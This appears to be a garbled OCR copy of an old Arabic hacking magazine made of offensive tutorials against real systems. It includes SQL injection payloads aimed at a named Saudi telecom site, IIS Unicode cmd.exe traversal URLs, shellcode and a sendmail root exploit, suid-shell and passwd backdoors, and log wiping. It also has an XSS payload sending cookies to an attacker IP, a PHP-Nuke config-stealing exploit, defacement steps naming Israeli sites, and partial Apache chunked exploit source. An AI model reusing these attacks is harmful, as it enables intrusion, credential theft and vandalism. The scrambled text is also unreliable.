.Not logged in
530
.Need account for storing files
532
Requested action not taken. (Fichier non trouv, pas d'accs
550
(...,possible
.Requested action aborded: page type unknown
551
.Requested file action aborded
552
(Requested action not taken. (Nom de fichier non attribu
553

" SQL "

221

> <
>< linuxray :
: ) ( SQL

ASP
SQL ASP SQL
SQL
1433
SQL

SQL .
: SQL
PHP ASP




_LinuxRay
- - -
. Administrator
...
: SQL
User Name Passwd
:
User name and Passwd ASP
* sql.
htr.+
:
http://target/page.asp+.htr
: target
: Page asp
: htr.+
....

View Source ASP
:

222

>%
("Set DB= Server.CreateObject("ADODB.Connection
DB.Open "DRIVER=SQL
Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer
"Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666
<%
---------------------------------------------------------------- _LinuxRay
6666666
-----------------------------------------------------------------

ASP :
'AMicrosoft VBScript runtime error '800a01a8
'Object required: 'Conn
filename.inc, line 5/
* inc.

.
ASP
database.inc
>!<--"include file = "database.inc#--

global.asa
global.asa++
beforemilion-global.asa
global.asamilion.sql
global-direct.asa
SQL
:
global.asa+.htr

223

 IIS 3 ASP data$::

file.asp::$data
IIS 3 .
...
!! SQL
Visual interdev 6.0
ACCESS 2000

File

New

(Project (Exiting Data
.

Create


Data Link Properties
- -
- 1 Select or enter server name
- 2 User Name
- 3 Password
) (Blank Password
Test Connection
Test Connection Succeeded
.
:
Select the data base on the server
OK .

" " SQL

> <
224

>< hish_hish :
(:
,
PHP ASP
.
SQL Server , MySQL,Oracle


SQL



(: ((((:


SQL


SQL

SQL injection


/http://www.stc.com.sa

http://www.stc.com.sa/arabic/scripts/ar_frame.asp?pagenum=25
!!!!
SQL injection

' :
' :

:

Microsoft OLE DB Provider for ODBC Drivers error

''80040e14
]Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed
.' '' quotation mark before the character string
arabic/Scripts/ar_csd_reply.asp, line 33/

225

Microsoft OLE DB Provider for ODBC Drivers error

''80040e14
]Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed
quotation mark
.''=before the character string ''' AND Password
admin/admin.asp, line 13/

SQL
inject SQL Query
.
SQL injection


:code

SELECT * from Users WHERE User_Name='<field from web

'<form>' AND Password='<field from web form
}( if( TRUE
Login OK
{
} else
Login FAILD
{

admin :
t0ps3cr3t :
SQL :
:code

SELECT * from Users WHERE Users_Name='admin' AND

'Password='t0ps3cr3t

User admin
t0ps3cr3t
TRUE .
FALSE
: . SQL
> <field from web form
' SQL
:
:code

226

'=SELECT * from Users WHERE User_Name=' ' ' AND Password

' '

!!
blah' OR '1'='1 :
.
SQL
:code

SELECT * from Users WHERE User_Name='blah' OR '1'='1' AND

'Password='blah' OR '1'='1

SELECT * from Users
Users
'WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1

''blah' OR '1'='1
OR

''blah
TRUE
''1'='1
1 1 !!!!
TRUE OR TRUE
TRUE

: TRUE TRUE

TRUE TRUE SQL injection
Users


.....
SQL WHERE
(two dashes) -- ,

--'blah' OR '1'='1 :
) --
SQL

having clause

'having 1=1--

'Microsoft OLE DB Provider for ODBC Drivers error '80040e14

227

Microsoft][ODBC SQL Server Driver][SQL Server]Column]

'cs_isp_user.UserID' is invalid in the select list because it is not
.contained in an aggregate function and there is no GROUP BY clause
Arabic/Scripts/ar_csd_reply.asp, line 33/


group by

'group by cs_isp_user.UserID-passwd

'group by cs_isp_user.UserID,cs_isp_user.passwd-!

:
--(blah' group by (username :
:
:

Microsoft OLE DB Provider for ODBC Drivers error

''80040e14
Microsoft][ODBC SQL Server Driver][SQL Server]Invalid]
.'column name 'username
arabic/Scripts/ar_csd_reply.asp, line 33/

username
password ,username,id,userid,email
first_name,
userid
:

Microsoft OLE DB Provider for ODBC Drivers error

''80040e14
Microsoft][ODBC SQL Server Driver][SQL Server]Column]
'cs_isp_user.passwd' is invalid in the select list because it
is not contained in either an aggregate function or the
.GROUP BY clause
arabic/Scripts/ar_csd_reply.asp, line 33/

228

 cs_isp_user
passwd

--(blah' group by (passwd :
:
:

Microsoft OLE DB Provider for ODBC Drivers error

''80040e14
]Microsoft][ODBC SQL Server Driver][SQL Server]Column
'cs_isp_user.UserID' is invalid in the select list because it is
not contained in either an aggregate function or the GROUP
.BY clause
arabic/Scripts/ar_csd_reply.asp, line 33/

UserID userid
MS SQL Server (:
UserID passwd


(:
blah' INSERT INTO :
cs_isp_user(UserID,passwd
( --('VALUES('M_3','hi
M_3 hi

) ( inject

id ) (
user

id
username ) ( admin1
passwd
union )
(
blah' union SELECT username FROM user :


:

229

Microsoft OLE DB Provider for ODBC Drivers error

''80040e14
Microsoft][ODBC SQL Server Driver][SQL Server]All]
queries in an SQL statement containing a UNION operator
must have an equal number of expressions in their target
.lists
admin/admin.asp, line 13/

id
blah' union SELECT username,username FROM user



blah' union SELECT username,username,usernam
e,username,username FROM user

:

Microsoft OLE DB Provider for ODBC Drivers error

''80040e07
Microsoft][ODBC SQL Server Driver][SQL Server]Syntax]
error converting the
.varchar value 'Lame_Admin' to a column of data type int
admin/admin.asp, line 13/

( :
)SQL
(int )( Lame_Admin
Lame_Admin ,
(: microsoft ( :

blah' union SELECT passwd,passwd,passwd,pass:
wd,passwd FROM user


:

Microsoft OLE DB Provider for ODBC Drivers error

230

''80040e07
]Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the
.varchar value 'stupid' to a column of data type int
admin/admin.asp, line 13/

Stored Procedure
Built-in
Stored Procedure SQL Server sa
SQL Server
SQL Server
Stored Procedure 100

---------------------------+
+------------------------------------------------------------------------------+
| |----------xp_cmdshell )
(|-------
| |-----------xp_regread
|--------------------------------------------
| |----xp_regdeletekey
|-------------------------------------------------
| |-xp_regdeletevalue
|--------------------------------------------
| |---------- xp_regwrite
|-------------------------------------------------------
| |--xp_servicecontrol
|--------------------------------------------
----------------------------+
+-----------------------------------------------------------------------------+

Procedure
'exec master..xp_cmdshell 'dir
xp_cmdshell

'exec master..xp_regwrite 'REGISTERY KEY' VALUE
231

 asp
asp

))CREAT TABLE M_3 ( source varchar(8000
M_3 varchar 8000

'bulk insert M_3 from 'c:\InetPub\wwwroot\login
asp.

union .

" "
> <
>< CONIK :




-:
-:1
-:

232

 user administrator

) (



-:2
-: %99 C

.
shell

PHP Shell PHP .

Kernel 2.2.x
) C (
perl
linux Redhat 7.3

233


-:3
-:
file.pl/.

----Access Denied

-----chmod +x Conik.pl

Conik.pl/. $
-:4 C
-:
<------ gcc -o Conik Conik.c
-:
gcc -o Conik conik.c

Conik.c/.

gcc -o sendmail sendmail.c $
sendemail/. $
<Usage : sendmail <host> <OS> <user> <password
<----- sendmail smtp.israel.com RedHat-7.3 anonymous anonymous /. $

234

 israel
...connecting to host
...connected
id
(uid=0(root) gid=0(root
Sendemail
Root Exan nofer
XXX. SENDMAIL

(-:

-:5
-:
-:6 Conik C Perl


PHP - CGI - UNICODE - VB - etc
-:7 UNICODE
-: UNICODE IIS Microsoft

-: UONICODE
vti_bin/.._/
%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../wi
\:nnt/system32/cmd.exe?/c+dir+c
Rpc/../
%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
\:+c
samples/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c

235

adsamples/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
\:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c /
msadc/..%c0%af../..%c0%af../../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
UONICODE
CGI
cgi-bin/view-source?../../../../../../../etc/passwd /
cgi-bin/phf/
cgi-bin/wwwboard.pl/
cgi-bin/AT-admin.cgi/
cgi-bin/info2www/
cgi-bin/environ.cgi/

NT : Uni code , bofferoverfollow , tftp

Liunx : Get Access , CGI , buffer overfollow , PHP , send mail , ProFTPD,
,WU-FTPD, Kernel Exploits, rootkits
UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel
,exploits, rootkits, ProFTPD, WU-FTPD

236

" "
> <
><Black_sNiper :
...

..

.:

who
rwho
finger

237


.:
username : Black
password : Black2
test demo
.:
etc/passwd/
etc/group/
etc/hosts/
usr/adm/sulog/
usr/adm/loginlog/
usr/adm/errlog/
usr/adm/culog/
usr/mail/
usr/lib/cron/crontabs /
etc/shadow/
.: bin


)( )( !!
.:
$ ed passwd
exec login !!
!!
.:
)( ..
.:
$ pwd
.:
$ /usr/admin
..
.. :
$ /usr/Black
!!
.:
$ ls /usr/Black
.:
mail
pers
games
bin
profile.
.:
$ cd

238

$ ls -a
:
:
profile.
$
.:
$ cat letter
letter
.:
$ passwd
!! ..
.:
$ grep phone Black

.:
$ cp letter letters
.:
$ write
.:
$ who
safadM tty1 april 19 2:30
paul tty2 april 19 2:19
gopher tty3 april 19 2:31

.. .:
$ cat /etc/passwd
:/:root:F943/sys34:0:1:0000
sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh
checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh
.:
:Black:chips11,43:34:3:Mr doooom:/usr/Black

..
.:
$ ls /etc/group
root::0:root
adm::2:adm,root
:bluebox::70

239

 !!

..

"
"
><
> : <
UNix Usage IN HackinG

.. up to date

(:
: pc , servers , supercomputers
BOX
..
... root , superuser
....
240

 :
.. .. windows
..
.. ...
:
-1 ... nt .
9x
.. ..
..
-2 .. ..
...
.. :
-1 ). (
-2 open source
.. (:

BSD ..

...
..
.. ) SuSe
(
MDK
..

9 ) 7.2 (
.. .. ... .. .. ..
.. ... .. ..
.. ... .. (:
..
.. ... .. ..
..
.. ..
.. ..
internal .. winmodems
.. windows ..
(:
.. external real or true modems
... acorp , u.s. robotics
serial USB
...
.. isp (:

241


..


:
-1 ..

isp ...
-2 ...
-3 ... .. ..
(:
=====< ... ..
======< ======< ...
.. .
:

.. ..
-4 gov .mil. edu.
.
-5 .. .
REdirecting
: TCP ..
TCP\IP
....
... =D
..

.. ) (

<< service..
service daemon or server
.. ..
=D
..
FTPd
FTP
21
telnetd Telnet
23
(!sendmail (yes
SMTP
25
apache
HTTP
80
qpop
POP3
110
d ftp , telnet ..etc daemon
: www.host.net
TCP 80

GET /HTTP/1.1 /index.html ..
index.html

242

 daemons ...
=<
daemons

... ..
... port scaners
..
... nmap fyodor
!!.. ..
=>
/http://members.lycos.co.uk/linuxdude/e3sar
.. nmap rpm
:
bash-2.03$ rpm -i nmap-2.53-1.i386.rpm
.. target.edu
..
:
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org
( /( www.insecure.org/nmap
:(Interesting ports on target.edu (xx.xx.xx.xx
)The 1518 ports scanned but not shown below are in state:
(closed
Port
State
Service
tcp open
ftp/21
tcp open
telnet/23
tcp open
smtp/25
tcp open
http/80
tcp open
pop3/110
Nmap run completed -- 1 IP address (1 host up) scanned in 34
seconds
nmap !!
daemons target.edu
..
.. .. .. ..
.. ... TCP :
bash-2.03$ telnet target.edu 21
...Trying xx.xx.xx.xx
.Connected to target.edu
.'[^' Escape character is
.target.edu FTP server (SunOS 5.6) ready 220
243

quit
.Goodbye 221
Connection closed by foreign host

(:
SunOS 5.6 -1
sunOS standard -2
:
bash-2.03$ telnet target.edu 25
...Trying xx.xx.xx.xx
.Connected to target.edu
.'[^' Escape character is
target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 220
09:18:14 -0
(EDT) 400
quit
target.edu closing connection 2.0.0 221
.Connection closed by foreign host
sendmail smtp
8.11.0/8.9.3
..
.. daemon

:
nmap
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org
( /( www.insecure.org/nmap
:(Interesting ports on target.edu (xx.xx.xx.xx
The 1518 ports scanned but not shown below are in state:)
(closed
Port
State
Service
tcp open
ftp/21
tcp open
telnet/23
tcp open
smtp/25
tcp open
http/80
tcp open
pop3/110
TCP Sequence Prediction: Class=random positive increments
(!Difficulty=937544 (Good luck
Remote operating system guess: Linux 2.1.122 - 2.2.14
Nmap run completed -- 1 IP address (1 host up) scanned in 34
seconds

244

 |:
!!!!!!
!!!!!! sunOS =@
..

..
...
Ss- =D
:
bash-2.03$ man nmap
..
) (
:
bash-2.03$ ls
program.c
sh-2.03$ ftp shell.com
Connected to shell.com
.shell.com FTP server (SunOS 5.6) ready 220
Name: luser
.Password required for luser 331
:Password
.User luser logged in 230
ftp> put program.c
.PORT command successful 200
.(ASCII data connection for program.c (204.42.253.18,57982 150
.Transfer complete 226
ftp> quit
Goodbye 221
ftp

.
sh-2.03$ vi exploit.c
c.
.

sh-2.03$ gcc program.c -o program
sh-2.03$ ./program
: ..

. usage
-: .

..

245

http://www.linux.com.cn/hack.co.za
..
..

.. TARGET.EDU
sendmail 8.11.0
..

:
http://www.pharaonics.net/less/NEtworks/124.htm
. .. )
(
.. ....
..

..
www.securityfocus.com :
www.insecure.org/sploits.html
..
..
... ) (

shell code
..

= []char shellcode
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b
"
"\
"x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd
"\;"x80\xe8\xdc\xff\xff\xff/bin/sh

.. bin/sh/

..
.
...
..
..
bash-2.03$ telnet myshellaccount 23
...Trying xx.xx.xx.xx
.Connected to yourshellaccount
.'[^' Escape character is
Welcome to yourshellaccount
login: malicioususer
(Password: (it doesn't display

246

.<Last login: Fry Sep 15 11:45:34 from <yourIPaddress

sh-2.03
exploit.c
.. :
sh-2.03$ gcc exploit.c -o exploit
sh-2.03$ ./exploit
This is a sendmail 8.9.11 exploit
usage: ./exploit target port
sh-2.03$./exploit 25 target.edu
$...
:
whoami$
root
.. =(
..
local
...
) =((
.. =<
-: .. ..

..
.. edu.


microsoft.com , ibm.com etc
...
..
<----- <------ .

.. exit



..
...
..
.. ... =| =|

=| !!!!!!
(= ...

..
..
-1 sushi

247

 sushi suid shell bin/sh/

suid :
sh-2.03$ cp /bin/sh /dev/nul

.. dev
null
= D =D
sh-2.03$ cd /dev
sh-2.03$ chown root nul
-:
sh-2.03$ chmod 4775 nul
4775 suid .
chmod +s nul ..
..
..
sh-2.03$ exit
80 = D :
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
root
=(
.. suid sushi
sash A
stand-alone shell
...
suid bin/sh/ sushi
-2
etc/passwd/

-: vi
sh-2.03$ vi /etc/passwd
vi

luser:passwd:uid:gid:startdir:shell
uid & gid =0
:
dood::0:0:dood:/:/bin/sh

sh-2.03$ su dood
sh-2.03$ whoami
dood

248

 .. dood gid uid

-3 bindshell
bindshell telnetd ..
TCP UDP
..


TCP UDP
-: .. ..
..

.<Last login: Sun Sep 24 10:32:14 from <yourIPaddress


-:
..
..
=(

usr/adm/lastlog/
var/adm/lastlog/
var/log/lastlog/
lled ..
...
ftp
wted lled
who
sh-2.03$ who
Sep 25 18:18

tty1

root

zap2
: luser
sh-2.03$ ./zap2 luser
!Zap2
sh-2.03$ who
sh-2.03$
:

249

 ..
.

" "
> <
> : <
...

250




FreeServers.com
:











Caller ID
...
notepade

Hakkerz.home.ml.org
html

@Blahblahblah

header

IP Whois

251

 finger
@Finger

scan ports IP
Linux /Unix systems
Exploit Generator

linux 21
FTP 23 TelNet
Telnet Anonymous

hakkerz.home.ml.org telnet 23
www telnet.Victim.com
telnet www
whois
21 ftp
SYST 80 http
Whats
?Running


Login: root$
Password: root$
linux
telnet

ACCOUNT: PASSWORD
)login) root: (password) root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install

252

demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon


whois unix
passwd
ftp
internet explorer
IP jammer .hakkerz.home.ml.org

ftp:// abc.net /ftp://ftp.abc.net ftp

whois \ etc
passwd
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW
administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
][.etc
kangaroo 3a62i9qr

root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu
TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh

* s ?xs
John the Ripper 1.5 .

253

" ) PHP Shell ( "

> < pharaonics
>> Arab VieruZ:

...

(:

:

:

254

 PHP Shell
**-----------------------------------------------
:

**-----------------------------------------------
ls -a :

**-----------------------------------------------
cat -e : cat

**-----------------------------------------------
rm -f :

**-----------------------------------------------
rm -d :

**-----------------------------------------------
cp -i :

**-----------------------------------------------
mv :

**-----------------------------------------------
:
help--

255

 ls --help :
**-----------------------------------------------
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------

256

 -1
-2
-3
-4
-5
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
!!!

-1
: hacked.txt
**-----------------------------------------------
-2



**-----------------------------------------------
-3 .

257

" ) PHP Shell ( "

> < pharaonics
>> Arab VieruZ:

**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
PHP Shell 2
.
**-----------------------------------------------
-1 My SQL config.php
PHP Shell

cat config.php

258

**-----------------------------------------------
-2 htpasswed.

htaccess.
/home/site/.htpasswds/forum/admin/passwd :
cat /home/site/.htpasswds/forum/admin/passwd :
DES
user:nymw4oS3oerdY
**-----------------------------------------------
-3 : service.pwd
DES
:
_vti_pvt
cat /home/site/www/_vti_pvt/service.pwd :
: DeXXa
user:nymw4oS3oerdY
**-----------------------------------------------
-4 :
phpMyAdmin

config.php
!!

259

" ) PHP Shell ( "

> < pharaonics
>> Arab VieruZ:


**-----------------------------------
-1 :
:
home/
: /
ls -a /home

ls -a /home/SITE
= SITE
**-----------------------------------
-2 :
home
:

260

 :
/home/site/public_html

/home/site/www

**-----------------------------------
-3

.

261

" " anmap

><
> : <
:
- nmap
:
-
:

.
:
UDP
()TCP connect
(TCP SYN (half open
(ftp proxy (bounceattack
Reverse-ident
(ICMP (ping sweep
FIN
ACK sweep
Xmas Tree
SYN sweep
.and Null scan
..:
remote OS detection via TCP/IP fingerprinting
stealth scanning
dynamic delay and retransmission calculations
parallel scanning

262

detection of down hosts via parallel pings

decoy scanning port
filtering detection
direct (non-portmapper) RPC scanning
fragmentation scanning
flexible target and port specification

.

)(


)(

:

TCP sequencability


.

263

" "
> <
><network access :







) (
%50 %50

aswind.COM
ip
INTERNIC.NET


INTERNIC.NET
:
NSLOOKUP
SET TYPE = ALL
aswind.COM
:
Domain Name: ASWIND.COM
264

.Registrar: ONLINENIC, INC

Whois Server: whois.OnlineNIC.com
/Referral URL: http://www.onlinenic.com
Name Server: DNS.ASWIND.COM
Name Server: NS1.ASWIND.COM
Updated Date: 01-apr-2002
aswind.com DNS = 2
2 DNS DNS
DNS
DNS
Ip aswind.com
6 .
IP DNS
DNS WIN2K DNS
DNS
DNS
HowIS
IP
LMHOSTS NetBios IP

C 200.200.200.0 LMHOSTS
NetBios N2 = 200.200.200.2 Net view
//servername N1 N254
1 254

\
Administrator


Windwos

username and password net user

Messenger Service
NetBios
IP 200.200.200.200 nbtstat -a 200.200.200.200
MSBROWSER )
(
John IP 200.200.200.50
Nbtstat -a 200.200.200.50 john

265

johnPC
) ( Administrator

Messenger Service )
(
MSBROWSER nbtstat -a




nt senstiver )
(.


l0pthcrack .

266

" " Cross Site Scripting

> <
><tcp :
:
HTML
JAVASCRIPT ,PERL ,CGI ,VBSCRIPT

===========================================================
====================================
:
*
* VBULLETIN YaBB and UBB

*
*
===========================================================
=====================================
:


267

 ... ..
===========================================================
=====================================
:
...

.


:
.Hello FOLKS board. This is a message
><SCRIPT>malicious code</SCRIPT
.This is the end of my message
malicious code
...
HTML
>script>document.write('<img
<src="http://my_ip_address/'+document.cookie+'">';</script

>?A HREF="http://example.com/comment.cgi
<mycomment=<SCRIPT>malicious code</SCRIPT>"> Click here</A

comment.cgi

268

 mycomment



.

>A HREF="http://example.com/comment.cgi? mycomment=<SCRIPT

<SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A

BADFILE

cross-site scripting " "

CSS

cross-site scripting CASCADE style sheets

><SCRIPT>, <OBJECT>, <APPLET>, and <EMBED
> <form HTML

=========================================================
:
http://www.cert.org/advisories/CA-2000-02.html
http://www.perl.com/pub/a/2002/02/20/css.html

269

" "
> <
> :<
, ...
, - - - - ......

........... :
.
.
.
.
.
.
.
.
.
.
.
.
.
:
==================================================
=
--><h3>put your text here<xmp><plaintext
==================================================

270

 .... put your text here ....

:
=====
!

" "
> <
><Dr^FunnY :
... html


..... ...
" "
" ... "HTML ...
(: .

.

271

" "
> <
= Exploit =
:

..
:
-1
super scan
.
-2
.

www.netcraft.net
!.!!.. ...
-3
-4


/....../www.thesite.com
:
*pl.

Active Perl

* c.

*sh.

www.securiteam.com
www.securityfocus.com
www.ukrt.f2s.com
www.ussrback.com
www.packetstorm.securify.com
272

www.secureroot.com
www.rootshell.com
.

.

.. shadowed
.encryption

root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:
sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer
Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp
Admin:/usr/lib/uucp: nuucp:x:9:9:uucp

...
x ..
:
root:x:0:1:Super-User:/:/sbin/sh
root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh
= root
= x

shadowed

shadow file

= token
* = Linux : /etc/shadow
token
= SunOS : /etc/shadow *
token
* = FreeBSD : /etc/master.passwd or /etc/shadow x
token
IRIX : /etc/shadow
token = x
! = AIX : /etc/security/passwd
token
* = ConvexOS : /etc/shadow or /etc/shadpw
token

::::::root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445
adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935::::::
::::::lp:NP:6445

EpGw4GekZ1B9U


John the ripper
.
x

:

john passwd
passwd

273

 :
by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996
Loaded 1 password
**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE


john.pot
.

" "
> <
>< icer :
:
1
2 ) (
3 ...
4 ...

: a face at the interface

..
...
http ..
scanner ....
, (BOF (buffer over flow) , DoS ( denial of service
DoS ...

....
DoS .
DoS GET / POST
OVERLOAD )
24 ( .... OFFLINE

1

.. ..


..
threads
cgi scaners
..

274

 <<< shadow security scaner...

..... rootshell.com

red hat 7.2

...... red hat 7.2

2
) ( shadow ..

...
url .. ..
url rootshell.com
%99 ..
.......

3 :
..
.. commands ..

, http BOF
..
..
....
config.inc

... DES/MD5 .... etc/passwd/ ...

DoS
DoS

... ..

4 :
:
packetstorm.securify.com /.securityfocus.com /www.insecure.org
/www.rootshell.com .(:

275

" "
><
><oOoDa BE$T :
:
txt. :
..
,.. ..
c. :
.. ..
)_ (compile )(_
... .. Linux
.. Shell Account
:
>---- gcc filenmae.c
:
>--- a.out ..

..
:
a.out xxx.xxx.xxx.xxx/.
:
pl. :
.. Linux Shell Account
exploit :
perl filename.pl xxx.xxx.xxx.xxx

filename xxx.xxx.xxx.xxx/.

276

" "
> <
><DeadLine :
:
:
Microsoft-IIS/5.0 on Windows 2000
98
98 :
Web Folders :
:
:
My Computer
My Computer

Web Folders
:
Add Web Folder
: Add Web Folder
Type the location to add
:
/http://hostname.com

277

 hostname

:
mail.talcar.co.il
daihatsu-israel.co.il
daewoo-israel.co.il
:
/http://192.117.143.121
Next :

finish :
Web Folder :
:
http://www.israwine.co.il/ 212.199.43.84
:

.

278

" "
<>
>Arab VireruZ :>
:
twlc: here your 0day from LucisFero and supergate
Posted on Monday, September 24 @ 14:25:58 CDT
topic: advisories
twlc security divison
24/09/2001
.Php nuke BUGGED
:Found by
LucisFero and supergate
twlc/.
Summary
This time the bug is really dangerous...it allows you to 'cp' any file on
...the box... or even upload files
Systems Affected
all the versions ARE vulnerable
except '5.0 RC1' (i wonder why a released c. is ok while the final 5.2 is
(bugged
Explanation
?Do you need sql password
http://www.server.net/admin.php?
upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfil
e=config.php&userfile_name=hacked.txt

279

the admin 'login' page will be prompted just go to

http://www.server.net/images/hacked.txt and you will see config.php that
as everyone knows contain the sql's passwords, you can even upload
files...i leave you the 'fun' to find all the ways to use it... and try to dont
be a SCRIPT KIDDIE we wrote this advisory to help who runs php nuke
.and NOT TO LET YOU HAVE FUN
:let me explain you the bug... admin.php contains this routine
;(basedir = dirname($SCRIPT_FILENAME$
;textrows = 20$
;textcols = 85$
;(udir = dirname($PHP_SELF$
;"/"=if(!$wdir) $wdir
;"if($cancel) $op="FileManager
} (if($upload
;(copy($userfile,$basedir.$wdir.$userfile_name
;"lastaction = ""._UPLOADED." $userfile_name --> $wdir$
This need a rewrite -------------------------------------> OMG! WE TOTALY //
AGREEEEEEEE lmao
;("include("header.php//
;(GraphicAdmin($hlpfile//
;()html_header//
;()displaydir//
;"/"=wdir2$
;(chdir($basedir . $wdir2
;()CloseTable//
;("include("footer.php//
;("Header("Location: admin.php?op=FileManager
;exit
{
that doesnt do a check to see if you are logged as admin or no... so you
...can use it anyway
Solution
we erased the function... cause we wanted to remove the file manager
-anyway but i suggest you to do the same... -to upload files use FTP
:conclusions
yet another bug of php nuke... this software is used by thousands of
people... (we run something based on it too) i hope that this time the
author will reply soon and will release a patch too! as i said before just
dont try to be a script kiddie or we simply WONT post anymore this kind
of advisories. Prolly the funny thing is that who first discovered the bug
was LucisFero that... 2 hours before didnt knew php ... so i (supergate)
.fear him and you should too
:posted at
http://www.twlc.net article http://www.twlc.net/article.php?sid=421
bugtraq@securityfocus.com

280

-http://www.phpnuke.org -good luck

http://sourceforge.net/tracker/?group_id=7511 Project: PHP-Nuke Web
Portal System
and of course mailed to the author of php nuke
contacts (bugs, ideas, insults, cool girls... remember that trojans are
:(directed to /dev/null
lucisfero@twlc.net
supergate@twlc.net
(http://www.twlc.net (yes we are patched
.peace out pimps. bella a tutti
eof
-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=
:
;(basedir = dirname($SCRIPT_FILENAME$
;textrows = 20$
;textcols = 85$
;(udir = dirname($PHP_SELF$
;"/"=if(!$wdir) $wdir
;"if($cancel) $op="FileManager
} (if($upload
;(copy($userfile,$basedir.$wdir.$userfile_name
;"lastaction = ""._UPLOADED." $userfile_name --> $wdir$
This need a rewrite -------------------------------------> OMG! WE TOTALY //
AGREEEEEEEE lmao
;("include("header.php//
;(GraphicAdmin($hlpfile//
;()html_header//
;()displaydir//
;"/"=wdir2$
;(chdir($basedir . $wdir2
;()CloseTable//
;("include("footer.php//
;("Header("Location: admin.php?op=FileManager
;exit
{
-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=
:
http://www.server.net/admin.php?
upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfil
e=config.php&userfile_name=hacked.txt

281

=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-
==-=-=-=-=-=-=-=-=-=-

?http://www.server.net/admin.php
upload=1&file=config.php&file_name=ultramode.txt&wdir=/&userfile=co
nfig.php&userfile_name=ultramode.txt
=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-
==-=-=-=-=-=-=-=-=-=-
:
= config.php ultramode.txt
(-:
http://server.com/ultramode.txt
=-

-1 server.com
-2 http://server.com/nuke :
-3 5.2 .

282

" " Chunked

>

<angels-bytes

Chunked Apache angels-bytes

Retina Apache Chunked Scanner
254 .
2.0.39

http://www.apache.org/dist/httpd/binaries

1.3.24 2 2 dev-2.0.36

))*/ angels-bytes.com ((
*/
*/ */
include#
include#
include#
include#
include#
include#
include#
include#
include#
283

include#
include#
define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it#
/* failed
define RET_ADDR_INC 512#
define MEMCPY_s1_OWADDR_DELTA -146#
define PADSIZE_1 4#
define PADSIZE_2 5#
define PADSIZE_3 7#
define REP_POPULATOR 24#
define REP_RET_ADDR 6#
define REP_ZERO 36#
define REP_SHELLCODE 24#
define NOPCOUNT 1024#
define NOP 0x41#
'\\define PADDING_1 \\'A#
'\\define PADDING_2 \\'B#
'\\define PADDING_3 \\'C#
;(define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s#
;define PUT_BYTES(n, b) memset(p, b, n); p += n#
define SHELLCODE_LOCALPORT_OFF 30#
= []char shellcode
\x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x10\\\\ "\\\
\\x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\xb8 \\\
"\\\x1f\\
\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x7a\\\\ "\\\
\\x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x7a \\\
"\\\x02\\
